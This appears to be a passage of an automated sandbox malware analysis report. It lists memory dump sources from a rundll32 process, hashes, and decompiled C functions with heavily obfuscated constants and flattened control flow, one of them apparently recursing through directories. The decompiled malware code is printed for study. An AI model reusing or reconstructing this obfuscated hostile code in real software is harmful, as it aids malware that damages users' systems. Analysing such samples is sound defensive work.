0x00359cf6
0x00359cfa
0x00359cfe
0x00359d06
0x00359d0e
0x00359d13
0x00359d1b
0x00359d23
0x00359d2b
0x00359d33
0x00359d3b
0x00359d3b
0x00359d4d
0x00359e02
0x00000000
0x00359d53
0x00359d59
0x00359df6
0x00359df8
0x00000000
0x00359d5f
0x00359d65
0x00359dc1
0x00359dc9
0x00359dce
0x00359dd1
0x00359dd3
0x00359dd5
0x00000000
0x00359dd5
0x00359d67
0x00359d6d
0x00359da0
0x00359da5
0x00359da7
0x00359da9
0x00359daf
0x00000000
0x00359daf
0x00359d6f
0x00359d75
0x00000000
0x00359d7b
0x00359d8f
0x00359d91
0x00000000
0x00359d91
0x00359d75
0x00359d6d
0x00359d65
0x00359d59
0x00000000
0x00359d4d
0x00359e0c
0x00359e16
0x00359e1f
0x00359e27
0x00359e33
0x00359e35
0x00359e38
0x00359e3d
0x00359e3d
0x00359e3d
0x00359e4a
0x00359e55

Strings

m9, xrefs: 00359CE5
<~), xrefs: 00359BD9
`/&, xrefs: 00359C3F
cA, xrefs: 00359DC1

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: <~)$`/&$cA$m9
API String ID: 0-2671356241
Opcode ID: 0357c323211fbb2750b6ff63dd811012db8b592bb5a4c14c508bc9731e28ab86
Instruction ID: 68a8d5ac174ff5ef137f8c664ffc4e8260c37c7c44d264af67fc6dd61e1a7d33
Opcode Fuzzy Hash: 0357c323211fbb2750b6ff63dd811012db8b592bb5a4c14c508bc9731e28ab86
Instruction Fuzzy Hash: 53516471008301DFC399CE21D49682BBBE1FFD8758F501D1EF9A6A6260C7B4DA498F92

Uniqueness

Uniqueness Score: -1.00%

Function 10043730 Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32 ref: 10043743
GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 10043755
GetACP.KERNEL32 ref: 1004377E

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Locale$InfoThread
String ID:
API String ID: 4232894706-0
Opcode ID: 138607bedea967b7fe84d9a3997690d852697f2840ddf7cd3550f999a21f7b57
Instruction ID: 788673dfdacf9fce6eb7172e6dd538a5e2a4211a9e61a4e82855ee0bc522c5dc
Opcode Fuzzy Hash: 138607bedea967b7fe84d9a3997690d852697f2840ddf7cd3550f999a21f7b57
Instruction Fuzzy Hash: 8AF0C871E04238ABE715DBA489955EFB7E4EB09A81B11816CD981E7251EA206D0487C9

Uniqueness

Uniqueness Score: -1.00%

Function 10018C9A Relevance: 4.5, APIs: 3, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
Instruction ID: 3e933570e0ddfcbf732aafa8bdad2c1db21bb76b11c706ff9f14b0ef8e609435
Opcode Fuzzy Hash: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
Instruction Fuzzy Hash: 63F03731505119EBDF01DF70CD48AAE3FA9FB04284F008020FD09D9060EB31EB95EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00350E53 Relevance: 4.1, Strings: 3, Instructions: 343
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E00350E53(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _t406;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t435;
				void* _t467;
				void* _t468;
				signed int* _t472;

				_t472 =  &_v2772;
				_v2700 = 0xd36ba7;
				_v2700 = _v2700 << 7;
				_v2700 = _v2700 ^ 0xaed70c65;
				_v2700 = _v2700 ^ 0xc762dfcc;
				_v2652 = 0x6f4609;
				_t9 =  &_v2652; // 0x6f4609
				_v2652 =  *_t9 * 0x1c;
				_t467 = __ecx;
				_v2652 = _v2652 ^ 0x0c23569d;
				_t468 = 0xea1969c;
				_v2608 = 0xb8394b;
				_v2608 = _v2608 + 0xaeb5;
				_v2608 = _v2608 ^ 0x00b390c3;
				_v2736 = 0x3d33f1;
				_v2736 = _v2736 + 0xffffd537;
				_v2736 = _v2736 + 0xffffb6ee;
				_v2736 = _v2736 + 0xbad8;
				_v2736 = _v2736 ^ 0x003e0409;
				_v2768 = 0xd1d4ce;
				_v2768 = _v2768 >> 0xc;
				_v2768 = _v2768 ^ 0xb5c37fe4;
				_v2768 = _v2768 + 0x4eb3;
				_v2768 = _v2768 ^ 0xb5c2c9c4;
				_v2760 = 0x157bbd;
				_v2760 = _v2760 ^ 0x6d7617e7;
				_v2760 = _v2760 ^ 0x1b56cd2f;
				_v2760 = _v2760 ^ 0xfb63426d;
				_v2760 = _v2760 ^ 0x8d577604;
				_v2604 = 0x1fac8b;
				_v2604 = _v2604 + 0x9962;
				_v2604 = _v2604 ^ 0x0029d956;
				_v2696 = 0x3d46b4;
				_v2696 = _v2696 | 0x3d7fd3ff;
				_v2696 = _v2696 ^ 0x3d7bd02d;
				_v2720 = 0xad1695;
				_t426 = 9;
				_v2720 = _v2720 * 0x4b;
				_v2720 = _v2720 >> 0x10;
				_v2720 = _v2720 << 0xe;
				_v2720 = _v2720 ^ 0x0cab1f79;
				_v2644 = 0xe14118;
				_v2644 = _v2644 ^ 0x82369820;
				_v2644 = _v2644 ^ 0x82de8a4e;
				_v2668 = 0x391c30;
				_v2668 = _v2668 >> 7;
				_v2668 = _v2668 + 0xffff3589;
				_v2668 = _v2668 ^ 0xfff6d862;
				_v2692 = 0x9dbc3;
				_v2692 = _v2692 << 8;
				_v2692 = _v2692 * 0x75;
				_v2692 = _v2692 ^ 0x81749ad9;
				_v2660 = 0x144a46;
				_v2660 = _v2660 >> 0xd;
				_v2660 = _v2660 ^ 0x0008b8c7;
				_v2752 = 0x703c03;
				_v2752 = _v2752 * 0x74;
				_v2752 = _v2752 ^ 0x2e54cb21;
				_v2752 = _v2752 | 0x6f17e683;
				_v2752 = _v2752 ^ 0x7f96e2f0;
				_v2676 = 0xa438e5;
				_v2676 = _v2676 / _t426;
				_v2676 = _v2676 + 0x92ff;
				_v2676 = _v2676 ^ 0x0015b827;
				_v2612 = 0x1c48b9;
				_t427 = 0x1a;
				_v2612 = _v2612 / _t427;
				_v2612 = _v2612 ^ 0x000154fb;
				_v2628 = 0x490198;
				_v2628 = _v2628 | 0x561f6486;
				_v2628 = _v2628 ^ 0x565ec1b9;
				_v2616 = 0xcec4ed;
				_t428 = 0x3d;
				_v2616 = _v2616 * 9;
				_v2616 = _v2616 ^ 0x074f393e;
				_v2636 = 0x4be85b;
				_v2636 = _v2636 >> 1;
				_v2636 = _v2636 ^ 0x002afd34;
				_v2728 = 0xca47ed;
				_v2728 = _v2728 << 1;
				_v2728 = _v2728 / _t428;
				_v2728 = _v2728 >> 3;
				_v2728 = _v2728 ^ 0x00084593;
				_v2620 = 0x793301;
				_v2620 = _v2620 | 0xccc0d5da;
				_v2620 = _v2620 ^ 0xccf56683;
				_v2684 = 0xd6c9e7;
				_v2684 = _v2684 >> 8;
				_v2684 = _v2684 + 0x30fc;
				_v2684 = _v2684 ^ 0x000dbf27;
				_v2656 = 0x6cf887;
				_v2656 = _v2656 | 0x54469415;
				_v2656 = _v2656 ^ 0x5469dd96;
				_v2712 = 0x1ba43e;
				_v2712 = _v2712 + 0xffff54b6;
				_v2712 = _v2712 >> 0x10;
				_v2712 = _v2712 ^ 0x536d0b9d;
				_v2712 = _v2712 ^ 0x5368fd88;
				_v2744 = 0x7fa81e;
				_v2744 = _v2744 + 0x45dd;
				_v2744 = _v2744 | 0xcc5c3b14;
				_t429 = 0x76;
				_v2744 = _v2744 * 0x48;
				_v2744 = _v2744 ^ 0x83f6fb81;
				_v2704 = 0x73cce1;
				_v2704 = _v2704 >> 6;
				_v2704 = _v2704 | 0x0e0742c3;
				_v2704 = _v2704 ^ 0x0e0521c8;
				_v2764 = 0x3737a7;
				_v2764 = _v2764 >> 0xb;
				_v2764 = _v2764 << 3;
				_v2764 = _v2764 + 0x14ac;
				_v2764 = _v2764 ^ 0x0004654a;
				_v2772 = 0xaeb57f;
				_v2772 = _v2772 / _t429;
				_v2772 = _v2772 << 0xf;
				_t430 = 0x37;
				_v2772 = _v2772 / _t430;
				_v2772 = _v2772 ^ 0x037ee988;
				_v2648 = 0x954498;
				_t431 = 0x4b;
				_v2648 = _v2648 / _t431;
				_v2648 = _v2648 ^ 0x00054dec;
				_v2640 = 0x8be41e;
				_v2640 = _v2640 >> 0xd;
				_v2640 = _v2640 ^ 0x00089615;
				_v2748 = 0xfabe1b;
				_v2748 = _v2748 ^ 0xff42a680;
				_v2748 = _v2748 + 0xffff8ee7;
				_v2748 = _v2748 + 0x1c5a;
				_v2748 = _v2748 ^ 0xffbaa703;
				_v2756 = 0x33a01d;
				_v2756 = _v2756 * 0x6f;
				_v2756 = _v2756 << 4;
				_v2756 = _v2756 >> 4;
				_v2756 = _v2756 ^ 0x066d94da;
				_v2672 = 0x7cb69f;
				_v2672 = _v2672 << 4;
				_v2672 = _v2672 * 0x4a;
				_v2672 = _v2672 ^ 0x40c5c2d0;
				_v2680 = 0xc0e1f8;
				_v2680 = _v2680 << 1;
				_v2680 = _v2680 | 0xa5ca1830;
				_v2680 = _v2680 ^ 0xa5ca6401;
				_v2732 = 0xd52773;
				_v2732 = _v2732 ^ 0x8b84e9f5;
				_v2732 = _v2732 + 0xffffa58a;
				_v2732 = _v2732 >> 1;
				_v2732 = _v2732 ^ 0x45a69f9f;
				_v2740 = 0x525c84;
				_v2740 = _v2740 * 0x45;
				_v2740 = _v2740 << 0xd;
				_v2740 = _v2740 + 0xffffe485;
				_v2740 = _v2740 ^ 0x5df42895;
				_v2688 = 0x8afd1b;
				_v2688 = _v2688 >> 0xa;
				_v2688 = _v2688 * 0x44;
				_v2688 = _v2688 ^ 0x000c822b;
				_v2632 = 0xb6ec99;
				_v2632 = _v2632 + 0xffff2a9a;
				_v2632 = _v2632 ^ 0x00b1db1a;
				_v2664 = 0xfa37e2;
				_v2664 = _v2664 * 0x4c;
				_v2664 = _v2664 + 0x9251;
				_v2664 = _v2664 ^ 0x4a4e0c53;
				_v2708 = 0xf9311d;
				_v2708 = _v2708 >> 2;
				_t406 = _v2708 * 0x30;
				_v2708 = _t406;
				_v2708 = _v2708 + 0xffffde46;
				_v2708 = _v2708 ^ 0x0bad021b;
				_v2624 = 0x51d14;
				_v2624 = _v2624 | 0x271919e8;
				_v2624 = _v2624 ^ 0x2716653c;
				_v2716 = 0x708eea;
				_v2716 = _v2716 + 0xfffff8d8;
				_v2716 = _v2716 | 0x4ca3cf3c;
				_v2716 = _v2716 ^ 0x396f5f4d;
				_v2716 = _v2716 ^ 0x7599e4cd;
				_v2724 = 0x3acc77;
				_v2724 = _v2724 + 0x56d;
				_v2724 = _v2724 + 0xb0bb;
				_v2724 = _v2724 + 0xffffce89;
				_v2724 = _v2724 ^ 0x003c4612;
				while(_t468 != 0x5de06da) {
					if(_t468 == 0xea1969c) {
						_t468 = 0xfa9128f;
						continue;
					} else {
						_t480 = _t468 - 0xfa9128f;
						if(_t468 != 0xfa9128f) {
							L8:
							__eflags = _t468 - 0xa8e801c;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E0035DA22(_v2652, _v2608, _t480, _v2736,  &_v2600, _t431, _v2768);
							 *((short*)(E0034B6CF( &_v2600, _v2760, _v2604, _v2696))) = 0;
							E00348969(_v2720,  &_v1560, _t480, _v2644, _v2668);
							_push(_v2752);
							_push(_v2660);
							E003447CE( &_v2600, _v2676, _v2692, _v2612, _v2628, E0035DCF7(_v2692, 0x341308, _t480),  &_v1560, _v2616, _v2636);
							E0034A8B0(_v2728, _t419, _v2620);
							_t431 = _v2684;
							_t406 = E0034EA99(_v2684, _t467, _v2656, _v2712,  &_v2080, _v2744);
							_t472 =  &(_t472[0x17]);
							if(_t406 != 0) {
								_t468 = 0x5de06da;
								continue;
							}
						}
					}
					return _t406;
				}
				_push(_v2648);
				_push(_v2700);
				_push(_v2772);
				_push( &_v1040);
				E003546BB(_v2704, _v2764);
				_push(_v2756);
				_push(_v2748);
				E003447CE( &_v1040, _v2672, _v2640, _v2680, _v2732, E0035DCF7(_v2640, 0x3413b8, __eflags),  &_v2080, _v2740, _v2688);
				_t435 = _v2632;
				E0034A8B0(_t435, _t409, _v2664);
				__eflags = 0;
				_push(_v2724);
				_push(0);
				_push(_t435);
				_push(0);
				_push(0);
				_push(_v2716);
				_t431 = _v2708;
				_push( &_v520);
				_t406 = E0034AB87(_v2708, _v2624, 0);
				_t472 = _t472 - 0xc + 0x64;
				_t468 = 0xa8e801c;
				goto L8;
			}

0x00350e53
0x00350e59
0x00350e63
0x00350e68
0x00350e70
0x00350e78
0x00350e80
0x00350e89
0x00350e90
0x00350e92
0x00350e9d
0x00350ea2
0x00350ead
0x00350eb8
0x00350ec3
0x00350ecb
0x00350ed3
0x00350edb
0x00350ee3
0x00350eeb
0x00350ef3
0x00350ef8
0x00350f00
0x00350f08
0x00350f10
0x00350f18
0x00350f20
0x00350f28
0x00350f30
0x00350f38
0x00350f43
0x00350f4e
0x00350f59
0x00350f61
0x00350f69
0x00350f71
0x00350f80
0x00350f83
0x00350f87
0x00350f8c
0x00350f91
0x00350f99
0x00350fa4
0x00350faf
0x00350fba
0x00350fc2
0x00350fc7
0x00350fcf
0x00350fd7
0x00350fdf
0x00350fe9
0x00350fed
0x00350ff5
0x00351000
0x00351008
0x00351013
0x00351020
0x00351024
0x0035102c
0x00351034
0x0035103c
0x0035104c
0x00351050
0x00351058
0x00351060
0x00351072
0x00351075
0x0035107c
0x00351089
0x00351094
0x0035109f
0x003510aa
0x003510bf
0x003510c2
0x003510c9
0x003510d4
0x003510df
0x003510e6
0x003510f1
0x003510f9
0x00351105
0x00351109
0x0035110e
0x00351116
0x00351121
0x0035112c
0x00351137
0x0035113f
0x00351144
0x0035114c
0x00351154
0x0035115f
0x0035116a
0x00351175
0x0035117d
0x00351185
0x0035118a
0x00351192
0x0035119a
0x003511a2
0x003511aa
0x003511b7
0x003511ba
0x003511be
0x003511c6
0x003511ce
0x003511d3
0x003511db
0x003511e3
0x003511eb
0x003511f0
0x003511f5
0x003511fd
0x00351205
0x00351215
0x00351219
0x00351222
0x00351227
0x0035122d
0x00351235
0x00351247
0x0035124a
0x00351251
0x0035125c
0x00351267
0x0035126f
0x0035127a
0x00351282
0x0035128a
0x00351292
0x0035129a
0x003512a7
0x003512b9
0x003512bd
0x003512c2
0x003512c7
0x003512cf
0x003512d7
0x003512e1
0x003512e5
0x003512ed
0x003512f5
0x003512f9
0x00351301
0x00351309
0x00351311
0x00351319
0x00351321
0x00351325
0x0035132d
0x0035133a
0x0035133e
0x00351343
0x0035134b
0x00351353
0x0035135b
0x00351365
0x00351369
0x00351371
0x0035137c
0x00351387
0x00351392
0x0035139f
0x003513a3
0x003513ab
0x003513b3
0x003513bb
0x003513c0
0x003513c5
0x003513c9
0x003513d1
0x003513d9
0x003513e4
0x003513ef
0x003513fa
0x00351402
0x0035140a
0x00351412
0x0035141a
0x00351422
0x0035142a
0x00351432
0x0035143a
0x00351442
0x0035144a
0x00351458
0x00351572
0x00000000
0x0035145e
0x0035145e
0x00351460
0x0035163b
0x0035163b
0x00351641
0x00000000
0x00000000
0x00351466
0x00351485
0x003514bc
0x003514c3
0x003514c8
0x003514d1
0x00351524
0x00351536
0x00351554
0x0035155b
0x00351560
0x00351565
0x0035156b
0x00000000
0x0035156b
0x00351565
0x00351460
0x00351651
0x00351651
0x00351579
0x00351587
0x0035158b
0x0035159a
0x0035159b
0x003515a0
0x003515a9
0x003515f0
0x003515fc
0x00351605
0x0035160d
0x0035160f
0x00351613
0x00351614
0x00351615
0x00351616
0x00351617
0x00351629
0x0035162d
0x0035162e
0x00351633
0x00351636
0x00000000

Strings

Fo, xrefs: 00350E80
M_o9, xrefs: 00351412
[K, xrefs: 003510D4

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Fo$M_o9$[K
API String ID: 0-3743190696
Opcode ID: 4335725fa17c732ea9db6eb7fa38b96bdfbf5842fa490c22678bc4027b45e6b5
Instruction ID: 57b34f0dd9c44088b7c974e05b5ebef959d44a283dd93633e4919d44777894e6
Opcode Fuzzy Hash: 4335725fa17c732ea9db6eb7fa38b96bdfbf5842fa490c22678bc4027b45e6b5
Instruction Fuzzy Hash: FC120EB14093818FD369CF21C58AA9BBBF1FBC5748F10891DE59A9A260D7B18909CF53

Uniqueness

Uniqueness Score: -1.00%

Function 00349DCF Relevance: 4.1, Strings: 3, Instructions: 315
COMMONCrypto

Download Yara Rule

C-Code - Quality: 80%

			E00349DCF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				intOrPtr _v136;
				char _v160;
				short _v708;
				short _v710;
				char _v712;
				signed int _v756;
				char _v1276;
				char _v1796;
				void* _t278;
				signed int _t306;
				signed int _t310;
				void* _t312;
				intOrPtr _t317;
				void* _t319;
				signed int _t324;
				void* _t327;
				void* _t353;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				void* _t373;
				void* _t374;

				_t317 = _a12;
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_t317);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003520B9(_t278);
				_v44 = 0x411c30;
				_t374 = _t373 + 0x20;
				_v44 = _v44 ^ 0x3aebcc2b;
				_v44 = _v44 ^ 0x10090153;
				_t319 = 0x338c922;
				_v44 = _v44 ^ 0x2aa3d158;
				_v56 = 0xa7c140;
				_v56 = _v56 >> 1;
				_v56 = _v56 ^ 0xbf613798;
				_v56 = _v56 ^ 0xbf3c535c;
				_v88 = 0xb7ebf9;
				_t365 = 0x52;
				_v88 = _v88 / _t365;
				_v88 = _v88 ^ 0x0004e01e;
				_v112 = 0x1a3e5b;
				_v112 = _v112 + 0xd588;
				_v112 = _v112 ^ 0x0012c9bc;
				_v8 = 0x55b84a;
				_t366 = 0x72;
				_v8 = _v8 * 0x74;
				_v8 = _v8 + 0xffff07de;
				_v8 = _v8 * 0x41;
				_v8 = _v8 ^ 0xdc74eedb;
				_v96 = 0x123c4e;
				_v96 = _v96 + 0x1d06;
				_v96 = _v96 ^ 0x001f978b;
				_v124 = 0x58f8d3;
				_v124 = _v124 * 0x2b;
				_v124 = _v124 ^ 0x0efbe47e;
				_v120 = 0x58d481;
				_v120 = _v120 << 5;
				_v120 = _v120 ^ 0x0b1fdd63;
				_v32 = 0x85548e;
				_v32 = _v32 / _t366;
				_v32 = _v32 * 0x2e;
				_v32 = _v32 ^ 0x0037cfdf;
				_v108 = 0x851b7a;
				_v108 = _v108 | 0xf3ff5f40;
				_v108 = _v108 ^ 0xf3fc1521;
				_v76 = 0x86d28f;
				_v76 = _v76 >> 0xd;
				_v76 = _v76 ^ 0x000a85f2;
				_v48 = 0x8a8988;
				_v48 = _v48 + 0xffff9d54;
				_v48 = _v48 + 0xffffb441;
				_v48 = _v48 ^ 0x008c2bbe;
				_v80 = 0x3fe2a4;
				_v80 = _v80 ^ 0x5e00b743;
				_v80 = _v80 ^ 0x5e39b1b0;
				_v116 = 0x4ea08b;
				_v116 = _v116 + 0xffffca32;
				_v116 = _v116 ^ 0x00427ef9;
				_v104 = 0xba6181;
				_v104 = _v104 + 0xf529;
				_v104 = _v104 ^ 0x00b33727;
				_v52 = 0x1e8210;
				_v52 = _v52 >> 8;
				_v52 = _v52 | 0xffb97487;
				_v52 = _v52 ^ 0xffb16a42;
				_v40 = 0xeabfd3;
				_v40 = _v40 ^ 0x26644279;
				_t367 = 0x3a;
				_v40 = _v40 / _t367;
				_v40 = _v40 ^ 0x00a36ea5;
				_v12 = 0xc9f67b;
				_v12 = _v12 + 0x836b;
				_v12 = _v12 | 0xa1408986;
				_t368 = 0x45;
				_v12 = _v12 * 0x75;
				_v12 = _v12 ^ 0xf1cc1c9a;
				_v36 = 0x1f6921;
				_v36 = _v36 ^ 0x9bf749ed;
				_v36 = _v36 / _t368;
				_v36 = _v36 ^ 0x024ed910;
				_v64 = 0x37ccf2;
				_v64 = _v64 + 0xfffff775;
				_t369 = 0x19;
				_v64 = _v64 * 0x24;
				_v64 = _v64 ^ 0x07d7b77b;
				_v28 = 0x370f8;
				_v28 = _v28 << 0xd;
				_v28 = _v28 + 0x6470;
				_v28 = _v28 >> 1;
				_v28 = _v28 ^ 0x37097055;
				_v20 = 0x84152c;
				_v20 = _v20 * 0x7e;
				_v20 = _v20 / _t369;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0x6c90d6a3;
				_v60 = 0x687dd9;
				_t370 = 0xc;
				_v60 = _v60 * 0x1d;
				_v60 = _v60 << 7;
				_v60 = _v60 ^ 0xeb212648;
				_v84 = 0xd09924;
				_v84 = _v84 * 0x7c;
				_v84 = _v84 ^ 0x650614c5;
				_v100 = 0x3804f2;
				_v100 = _v100 | 0x9eb8052c;
				_v100 = _v100 ^ 0x9eb506d7;
				_v92 = 0xf492b0;
				_v92 = _v92 + 0xffffc4ae;
				_v92 = _v92 ^ 0x00fafa5e;
				_v16 = 0xd0e41e;
				_v16 = _v16 * 0x3d;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 ^ 0x000dc1c9;
				_v24 = 0x66d2fe;
				_v24 = _v24 / _t370;
				_v24 = _v24 + 0xffffccd2;
				_v24 = _v24 ^ 0x0a93dd72;
				_v24 = _v24 ^ 0x0a9c564f;
				_v72 = 0xbcf4e;
				_v72 = _v72 >> 7;
				_v72 = _v72 ^ 0x000c8ddf;
				_t364 = _v72;
				_v68 = 0x4616df;
				_v68 = _v68 + 0x9c8e;
				_v68 = _v68 + 0xaaef;
				_v68 = _v68 ^ 0x004c065d;
				while(1) {
					L1:
					_t353 = 0x2e;
					L2:
					while(_t319 != 0x21229d9) {
						if(_t319 == 0x338c922) {
							_v136 = _t317;
							_t319 = 0x9035918;
							continue;
						}
						if(_t319 == 0x5b964d8) {
							__eflags = _v756 & _v44;
							if(__eflags == 0) {
								_t306 = _a16( &_v756,  &_v160);
								asm("sbb ecx, ecx");
								_t324 =  ~_t306 & 0x09c7cc54;
								L9:
								_t319 = _t324 + 0x21229d9;
								while(1) {
									L1:
									_t353 = 0x2e;
									goto L2;
								}
							}
							__eflags = _v712 - _t353;
							if(_v712 != _t353) {
								L19:
								__eflags = _a24;
								if(__eflags != 0) {
									_push(_v104);
									_push(_v116);
									_t312 = E0035DCF7(_v80, 0x3417a0, __eflags);
									_pop(_t327);
									E003447CE(_t317, _v52, _t327, _v40, _v12, _t312,  &_v712, _v36, _v64);
									E00349DCF(_v28, _v20, _v60, _a8,  &_v1276, _a16, _v84, _a24);
									_t310 = E0034A8B0(_v100, _t312, _v92);
									_t374 = _t374 + 0x3c;
									_t353 = 0x2e;
								}
								L18:
								_t319 = 0xbd9f62d;
								continue;
							}
							__eflags = _v710;
							if(__eflags == 0) {
								goto L18;
							}
							__eflags = _v710 - _t353;
							if(_v710 != _t353) {
								goto L19;
							}
							__eflags = _v708;
							if(__eflags != 0) {
								goto L19;
							}
							goto L18;
						}
						if(_t319 == 0x9035918) {
							_push(_v112);
							_push(_v88);
							E0034A918(_t317, __eflags, _v8, _v96, E0035DCF7(_v56, 0x341770, __eflags), _v124,  &_v1796);
							_t374 = _t374 + 0x1c;
							_t310 = E0034A8B0(_v120, _t307, _v32);
							_t319 = 0xb066d4a;
							while(1) {
								L1:
								_t353 = 0x2e;
								goto L2;
							}
						}
						if(_t319 == 0xb066d4a) {
							_t310 = E00347E00(_v108,  &_v756, _v76, _v48,  &_v1796);
							_t364 = _t310;
							_t374 = _t374 + 0xc;
							__eflags = _t310 - 0xffffffff;
							if(__eflags == 0) {
								L25:
								return _t310;
							}
							_t319 = 0x5b964d8;
							goto L1;
						}
						if(_t319 != 0xbd9f62d) {
							L24:
							__eflags = _t319 - 0xa89df2;
							if(__eflags != 0) {
								continue;
							}
							goto L25;
						}
						_t310 = E00344635(_v16,  &_v756, _t364, _v24);
						asm("sbb ecx, ecx");
						_t324 =  ~_t310 & 0x03a73aff;
						goto L9;
					}
					E00348ABF(_t364, _v72, _v68);
					_t319 = 0xa89df2;
					_t353 = 0x2e;
					goto L24;
				}
			}

0x00349dd9
0x00349dde
0x00349de1
0x00349de4
0x00349de7
0x00349de8
0x00349deb
0x00349dee
0x00349def
0x00349df0
0x00349df5
0x00349dfc
0x00349dff
0x00349e08
0x00349e0f
0x00349e14
0x00349e1b
0x00349e22
0x00349e25
0x00349e2c
0x00349e33
0x00349e3f
0x00349e44
0x00349e49
0x00349e50
0x00349e57
0x00349e5e
0x00349e65
0x00349e70
0x00349e71
0x00349e74
0x00349e7f
0x00349e82
0x00349e89
0x00349e90
0x00349e97
0x00349e9e
0x00349ea9
0x00349eac
0x00349eb3
0x00349eba
0x00349ebe
0x00349ec5
0x00349ed1
0x00349ed8
0x00349edb
0x00349ee2
0x00349ee9
0x00349ef0
0x00349ef7
0x00349efe
0x00349f02
0x00349f09
0x00349f10
0x00349f17
0x00349f1e
0x00349f25
0x00349f2c
0x00349f33
0x00349f3a
0x00349f41
0x00349f48
0x00349f4f
0x00349f56
0x00349f5d
0x00349f64
0x00349f6b
0x00349f71
0x00349f78
0x00349f7f
0x00349f86
0x00349f92
0x00349f97
0x00349f9c
0x00349fa3
0x00349faa
0x00349fb1
0x00349fbc
0x00349fbf
0x00349fc2
0x00349fc9
0x00349fd0
0x00349fde
0x00349fe1
0x00349fe8
0x00349fef
0x00349ffa
0x00349ffd
0x0034a000
0x0034a007
0x0034a00e
0x0034a012
0x0034a019
0x0034a01c
0x0034a023
0x0034a02e
0x0034a038
0x0034a03b
0x0034a03f
0x0034a046
0x0034a051
0x0034a052
0x0034a055
0x0034a059
0x0034a060
0x0034a06b
0x0034a06e
0x0034a075
0x0034a07c
0x0034a083
0x0034a08a
